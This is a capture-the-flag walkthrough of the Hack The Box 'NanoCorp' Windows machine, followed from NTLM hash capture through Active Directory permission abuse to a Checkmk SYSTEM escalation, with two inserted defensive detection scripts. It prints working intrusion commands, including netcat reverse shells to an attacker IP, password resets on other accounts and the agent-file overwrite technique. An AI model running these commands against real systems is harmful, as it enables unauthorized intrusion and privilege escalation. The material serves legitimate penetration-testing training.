Hack The Box / WINDOWS / 2026-06-20
Hack The Box — NanoCorp (Windows)
A Windows File Explorer vulnerability (CVE-2025-24071) allows an attacker to capture the credentials of a user (an NTLMv2 hash, which we crack). That user can change the password of another user who has shell access on the machine. Finally, we exploit a vulnerability in the Checkmk agent (CVE-2024-0670) to get a reverse shell as nt authority\system.
Target:
- IP: 10.10.11.93
Port scan
sudo nmap -sC -sV 10.10.11.93 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-12 03:46:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.nanocorp.htb
| Issuer: commonName=DC01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-20T01:58:09
| Not valid after: 2026-04-21T01:58:09
| MD5: 4f00:467e:e490:4141:7c94:19b7:4ab3:76e6
|_SHA-1: 0b96:8038:2148:abee:9372:2809:14f1:b62a:a539:320b
|_ssl-date: 2025-11-12T03:48:07+00:00; +9h14m39s from scanner time.
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.nanocorp.htb
| Subject Alternative Name: DNS:dc01.nanocorp.htb
| Issuer: commonName=dc01.nanocorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-06T22:58:43
| Not valid after: 2026-04-06T23:18:43
| MD5: 2e3e:1a10:10b8:7f43:dc93:a4d9:05ef:6053
|_SHA-1: 4674:6312:27ce:e783:91b7:ec00:1746:f114:d669:4ea0
|_http-server-header: Microsoft-HTTPAPI/2.0
6556/tcp open check_mk check_mk extension for Nagios 2.1.0p10
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
54100/tcp open msrpc Microsoft Windows RPC
54119/tcp open msrpc Microsoft Windows RPC
58937/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: nanocorp.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add dc01.nanocorp.htb and nanocorp.htb to /etc/hosts.
Initial enumeration
With a browser, go to http://nanocorp.htb/. It is a PHP website served by Apache on Windows. Clicking on About Us reveals a link to hire.nanocorp.htb. Add hire.nanocorp.htb to /etc/hosts and go to http://hire.nanocorp.htb/. It is also a PHP website.
We can upload a file. The website says that only .zip files are allowed, but if we upload an invalid .zip file we get: Invalid file type. Only ZIP, 7Z, and RAR files are allowed. So 7z and RAR files are accepted as well.
File Explorer vulnerability - CVE-2025-24071
There is a vulnerability in Windows File Explorer: CVE-2025-24071.
A PoC is available here: https://github.com/0x6rss/CVE-2025-24071_PoC. Let's replicate it.
First, run Responder:
sudo responder -I tun0
Then, run the PoC:
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
cd CVE-2025-24071_PoC
python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.16.119
completed
A file exploit.zip is created. Upload it to the website and wait. On the terminal running Responder, we get:
[SMB] NTLMv2-SSP Client : 10.10.11.93
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:9af330c92ab237aa:3FAAAC9EDEC73414E3E3214BFD8E7801:01010000000000000006EA90E579DC01E0E0F7029844F9A60000000002000800540053004D00540001001E00570049004E002D00510031005A003800570036005A00350049003800550004003400570049004E002D00510031005A003800570036005A0035004900380055002E00540053004D0054002E004C004F00430041004C0003001400540053004D0054002E004C004F00430041004C0005001400540053004D0054002E004C004F00430041004C00070008000006EA90E579DC01060004000200000008003000300000000000000000000000002000007542898D7474CAA3E415CB668DEE73B843AA1DC825CD37369E89E55B727127910A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100310039000000000000000000
Cracking the password of the user web_svc
Put the hash in a file named hash and crack it with hashcat:
hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt
We get:
WEB_SVC::NANOCORP:9af330c92ab237aa:3faaac9edec73414e3e3214bfd8e7801:...:dksehdgh712!@#
We got credentials: web_svc / dksehdgh712!@#
Let's use them for SMB enumeration:
nxc smb dc01.nanocorp.htb -u web_svc -p 'dksehdgh712!@#' --shares
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [+] nanocorp.htb\web_svc:dksehdgh712!@#
SMB 10.10.11.93 445 DC01 [*] Enumerated shares
SMB 10.10.11.93 445 DC01 Share Permissions Remark
SMB 10.10.11.93 445 DC01 ----- ----------- ------
SMB 10.10.11.93 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.93 445 DC01 C$ Default share
SMB 10.10.11.93 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.93 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.93 445 DC01 SYSVOL READ Logon server share
BloodHound enumeration
We can enumerate the domain with BloodHound:
bloodhound-ce-python -u web_svc -p 'dksehdgh712!@#' -ns 10.10.11.93 -d 'nanocorp.htb' -dc dc01.nanocorp.htb -c All --zip
We get a .zip file.
Run BloodHound. On Kali Linux:
sudo bloodhound
Upload the .zip to BloodHound.
From BloodHound we see that web_svc has an AddSelf edge to the it_support group, so we can add our user to this group.
Download bloodyAD: https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' add groupMember it_support web_svc
[+] web_svc added to it_support
Changing the password of the user monitoring_svc
From BloodHound we see that the it_support group has a ForceChangePassword edge to the monitoring_svc user, so we can change that user's password.
python3 bloodyAD/bloodyAD.py --host dc01.nanocorp.htb -d nanocorp.htb --dc-ip 10.10.11.93 -u 'web_svc' -p 'dksehdgh712!@#' set password monitoring_svc 'Summer2025!'
[+] Password changed successfully!
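A detection for the AddSelf then ForceChangePassword chain above, written here as an added example and not part of the writeup: it correlates a group self-add (Security events 4728/4732/4756 where the added member is the actor) with a later 4724 password reset by the same actor on a different account, over constructed sample events.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Member-added events for global, local and universal security groups, and the
# "attempt was made to reset an account's password" event, from the Windows Security log.
GROUP_ADD = {4728, 4732, 4756}
PASSWORD_RESET = 4724

# Constructed sample events, reduced to the Security-log fields the rule needs.
# Names mirror the writeup's attack path; times are made up. Real 4728 events carry
# MemberName as a distinguished name; here it is simplified to the sAMAccountName.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "4728", "TimeCreated": "2025-11-12T03:52:10", "SubjectUserName": "web_svc",
     "MemberName": "web_svc", "TargetUserName": "it_support"},
    {"EventID": "4724", "TimeCreated": "2025-11-12T03:55:42", "SubjectUserName": "web_svc",
     "MemberName": "", "TargetUserName": "monitoring_svc"},
    {"EventID": "4728", "TimeCreated": "2025-11-12T08:00:00", "SubjectUserName": "admin1",
     "MemberName": "bob", "TargetUserName": "it_support"},
    {"EventID": "4724", "TimeCreated": "2025-11-12T09:00:00", "SubjectUserName": "admin1",
     "MemberName": "", "TargetUserName": "alice"},
]

def self_add_then_reset(events: List[Dict[str, str]],
                        window: timedelta = timedelta(hours=1)) -> List[Dict[str, str]]:
    """Flag an actor that adds itself to a group and, within `window`, resets another
    account's password (the AddSelf -> ForceChangePassword chain)."""
    self_adds = []  # (time, actor, group) for every self-membership change seen so far
    alerts = []
    for e in sorted(events, key=lambda ev: ev["TimeCreated"]):
        t = datetime.fromisoformat(e["TimeCreated"])
        actor = e["SubjectUserName"].lower()
        eid = int(e["EventID"])
        if eid in GROUP_ADD and e["MemberName"].lower() == actor:
            self_adds.append((t, actor, e["TargetUserName"]))
        elif eid == PASSWORD_RESET and e["TargetUserName"].lower() != actor:
            for t0, a0, group in self_adds:
                if a0 == actor and timedelta(0) <= t - t0 <= window:
                    alerts.append({"actor": actor, "group": group,
                                   "victim": e["TargetUserName"], "time": e["TimeCreated"]})
                    break
    return alerts
```

On the sample the rule raises exactly one alert (web_svc adding itself to it_support and then resetting monitoring_svc); the admin1 events are a normal helpdesk pattern and stay quiet.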
Now, let's enumerate the SMB shares with the new user:
nxc smb dc01.nanocorp.htb -u monitoring_svc -p 'Summer2025!' --shares
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [-] nanocorp.htb\monitoring_svc:Summer2025! STATUS_ACCOUNT_RESTRICTION
The error is explained here: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-apds/639c2244-b6d5-4ca3-8ca0-74fe787cbae6. Apparently, this error happens when NTLM authentication is used, so let's switch to Kerberos. Grab a TGT for the user monitoring_svc:
getTGT.py nanocorp.htb/monitoring_svc:'Summer2025!' -dc-ip 10.10.11.93
[*] Saving ticket in monitoring_svc.ccache
export KRB5CCNAME=monitoring_svc.ccache
nxc smb dc01.nanocorp.htb -d nanocorp.htb -k --use-kcache --shares
SMB dc01.nanocorp.htb 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB dc01.nanocorp.htb 445 DC01 [+] nanocorp.htb\monitoring_svc from ccache
SMB dc01.nanocorp.htb 445 DC01 [*] Enumerated shares
SMB dc01.nanocorp.htb 445 DC01 Share Permissions Remark
SMB dc01.nanocorp.htb 445 DC01 ----- ----------- ------
SMB dc01.nanocorp.htb 445 DC01 ADMIN$ Remote Admin
SMB dc01.nanocorp.htb 445 DC01 C$ Default share
SMB dc01.nanocorp.htb 445 DC01 IPC$ READ Remote IPC
SMB dc01.nanocorp.htb 445 DC01 NETLOGON READ Logon server share
SMB dc01.nanocorp.htb 445 DC01 SYSVOL READ Logon server share
Now it works. From BloodHound we see that monitoring_svc is a member of the Remote Management Users group, so we can use evil-winrm to get a shell on the machine.
First, edit /etc/krb5.conf and add these lines:
[realms]
NANOCORP.HTB = {
kdc = dc01.nanocorp.htb
admin_server = dc01.nanocorp.htb
}
[domain_realm]
.nanocorp.htb = NANOCORP.HTB
nanocorp.htb = NANOCORP.HTB
Then, run evil-winrm:
evil-winrm -i dc01.nanocorp.htb -u monitoring_svc -r nanocorp.htb -P 5986 -S
We get a PowerShell shell. However, this shell is not very stable, so let's get a more stable reverse shell.
Download nc64.exe (https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe) and upload it to the victim machine (for example, using a Python HTTP server and curl).
On the attacking machine, run a netcat listener:
rlwrap nc -vlnp 4444
On the victim machine, run:
C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444
We get a reverse shell. Type powershell to get a PowerShell shell.
Checkmk - CVE-2024-0670
In C:\ProgramData we notice a checkmk folder: it belongs to the Checkmk monitoring agent.
In ProgramData we also find a file cmk_agent_uninstall.txt, which contains:
Checkmk monitoring agent service - 2.1, 64-bit
We have the version, so we can search the internet for known vulnerabilities. We find one: CVE-2024-0670.
It is described here: https://checkmk.com/werk/16361.
A PoC is described here: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/.
We can create files in C:\Windows\Temp with a name that follows a precise pattern (cmk_all_\d+_1.cmd), and the agent will run the commands in that file as nt authority\system.
icacls C:\Windows\Temp
C:\Windows\Temp: Access is denied.
Successfully processed 0 files; Failed processing 1 files
Apparently, the monitoring_svc user does not have permission to write to C:\Windows\Temp. Let's try to get a reverse shell as web_svc.
Download RunasCs.exe (https://github.com/antonioCoco/RunasCs) and upload it to the victim machine. Then, on the victim machine, run:
.\RunasCs.exe web_svc 'dksehdgh712!@#' "whoami"
nanocorp\web_svc
We can run commands as web_svc. Let's get the reverse shell.
On the attacking machine, run a netcat listener:
rlwrap nc -vlnp 4444
On the victim machine, run:
.\RunasCs.exe web_svc 'dksehdgh712!@#' "C:\tmp\nc64.exe -e cmd.exe 10.10.16.119 4444"
We get a reverse shell as web_svc. Type powershell to get a PowerShell shell.
icacls C:\Windows\Temp
C:\Windows\Temp BUILTIN\Users:(CI)(S,WD,AD,X)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
CREATOR OWNER:(OI)(CI)(IO)(F)
NANOCORP\web_svc:(OI)(CI)(F)
Now we can write to C:\Windows\Temp, since web_svc has full control ((OI)(CI)(F)) on the folder.
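The root cause of this privilege escalation is visible in the icacls output above: a non-administrative account holds write rights on a directory that a SYSTEM service executes scripts from. As an added defender-side check, not part of the writeup, the following script parses icacls output (the sample is the output shown above, embedded as constructed input) and reports every principal outside the expected set that can create or overwrite files in the directory itself.

```python
import re
from typing import Dict, List, NamedTuple, Set
# Constructed sample: the icacls output for C:\Windows\Temp shown in the writeup,
# plus the summary line icacls prints, so the check runs offline.
SAMPLE_ICACLS = r"""C:\Windows\Temp BUILTIN\Users:(CI)(S,WD,AD,X)
                BUILTIN\Administrators:(F)
                BUILTIN\Administrators:(OI)(CI)(IO)(F)
                NT AUTHORITY\SYSTEM:(F)
                NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                CREATOR OWNER:(OI)(CI)(IO)(F)
                NANOCORP\web_svc:(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
"""

INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Rights that let a principal create or overwrite files inside the directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}
# Principals expected to hold write rights on a directory a SYSTEM service executes from.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "CREATOR OWNER", "NT SERVICE\\TrustedInstaller"}
# Optional leading path (first line only, no spaces in it), then "principal:(..)(..)".
ACE_RE = re.compile(r"^(?:[A-Za-z]:\\\S*\s+)?(?P<who>[^:()]+):(?P<groups>(?:\([^)]*\))+)$")
Ace = NamedTuple("Ace", [("who", str), ("inherit", Set[str]), ("rights", Set[str])])

def parse_icacls(output: str) -> List[Ace]:
    """Turn icacls text into ACEs; lines that are not ACEs (blank, summary) are skipped."""
    aces = []
    for raw in output.splitlines():
        m = ACE_RE.match(raw.strip())
        if not m:
            continue
        inherit, rights = set(), set()
        for group in re.findall(r"\(([^)]*)\)", m.group("groups")):
            parts = {p.strip() for p in group.split(",")}
            # A group made only of inheritance flags, e.g. (OI)(CI), is not a rights group.
            (inherit if parts <= INHERITANCE_FLAGS else rights).update(parts)
        aces.append(Ace(m.group("who").strip(), inherit, rights))
    return aces

def writable_by_untrusted(output: str) -> Dict[str, Set[str]]:
    """Map each untrusted principal to the write rights it holds on the directory itself."""
    findings: Dict[str, Set[str]] = {}
    for ace in parse_icacls(output):
        # Inherit-only (IO) ACEs apply to children, not to the directory itself.
        if "IO" in ace.inherit or ace.who in TRUSTED:
            continue
        hit = ace.rights & WRITE_RIGHTS
        if hit:
            findings.setdefault(ace.who, set()).update(hit)
    return findings
```

On this sample it flags NANOCORP\web_svc (F) and also BUILTIN\Users (WD, AD), which is why an agent that executes files from C:\Windows\Temp is a problem even on a host with default ACLs.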
Now, we don't know the number in the file name used by the exploit, and it can change. To find the range of possible numbers, let's monitor the files cmk_all_*_1.cmd that the agent creates in C:\Windows\Temp.
See the attached script monitor.ps1 and upload it to the victim machine.
.\monitor.ps1
Monitoring C:\Windows\Temp for cmk_all_*_*.cmd
To trigger the creation of the cmk_all file, following the PoC, we can trigger a repair of the Checkmk installation.
We have to find the .msi file of Checkmk in the folder C:\Windows\Installer. There are several ways:
- Reading specific registry keys:
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\*\InstallProperties' | fl
We notice that Checkmk has the following local package: C:\Windows\Installer\1e6f2.msi
- Checking the .msi files in the folder C:\Windows\Installer. See the attached script check_msi.ps1 and upload it to the victim machine.
.\check_msi.ps1
MSIFile ProductName
------- -----------
1e6f2.msi Check MK Agent 2.1
387c2.msi Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532
387c6.msi Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532
387ca.msi Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532
387ce.msi Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532
387d1.msi VMware Tools
We notice that the .msi file of Checkmk is 1e6f2.msi.
Now, in another shell as web_svc, following the PoC, we trigger the creation of the cmk_all file with the command:
msiexec /fa C:\Windows\Installer\1e6f2.msi /qn
On the terminal with monitor.ps1, we get:
[2025-12-31 16:36:25] Checkmk temp file created: C:\Windows\Temp\cmk_all_7580_1.cmd
We can reasonably assume that the correct range of numbers is between 1000 and 10000.
But, instead of brute forcing the number, since we can monitor when the cmk_all file is created in C:\Windows\Temp, as soon as we detect it we can overwrite its content with the commands we want to run. The idea is to get a reverse shell as nt authority\system.
Copy nc64.exe to C:\Windows\Temp. Then, on the attacking machine, run a netcat listener:
rlwrap nc -vlnp 4444
See the attached script monitor_and_replace.ps1. Upload it to the victim machine and run it:
.\monitor_and_replace.ps1
In the other shell as web_svc, trigger the creation of the cmk_all file with the command:
msiexec /fa C:\Windows\Installer\1e6f2.msi /qn
On the terminal with monitor_and_replace.ps1, we get:
[2026-01-01 15:43:05] Checkmk temp file created: C:\Windows\Temp\cmk_all_2436_1.cmd
Replaced content with payload
On the terminal with the netcat listener, we get a reverse shell as nt authority\system. Type powershell to get a PowerShell shell.
whoami
nt authority\system
Useful Notes
Check the number of files in a folder:
$filesCount = (Get-ChildItem "C:\Windows\Temp" -File).Count; $filesCount
Check the 10 most recently accessed files in a folder:
Get-ChildItem C:\Windows\Temp | Sort-Object LastAccessTime -Descending | Select-Object -First 10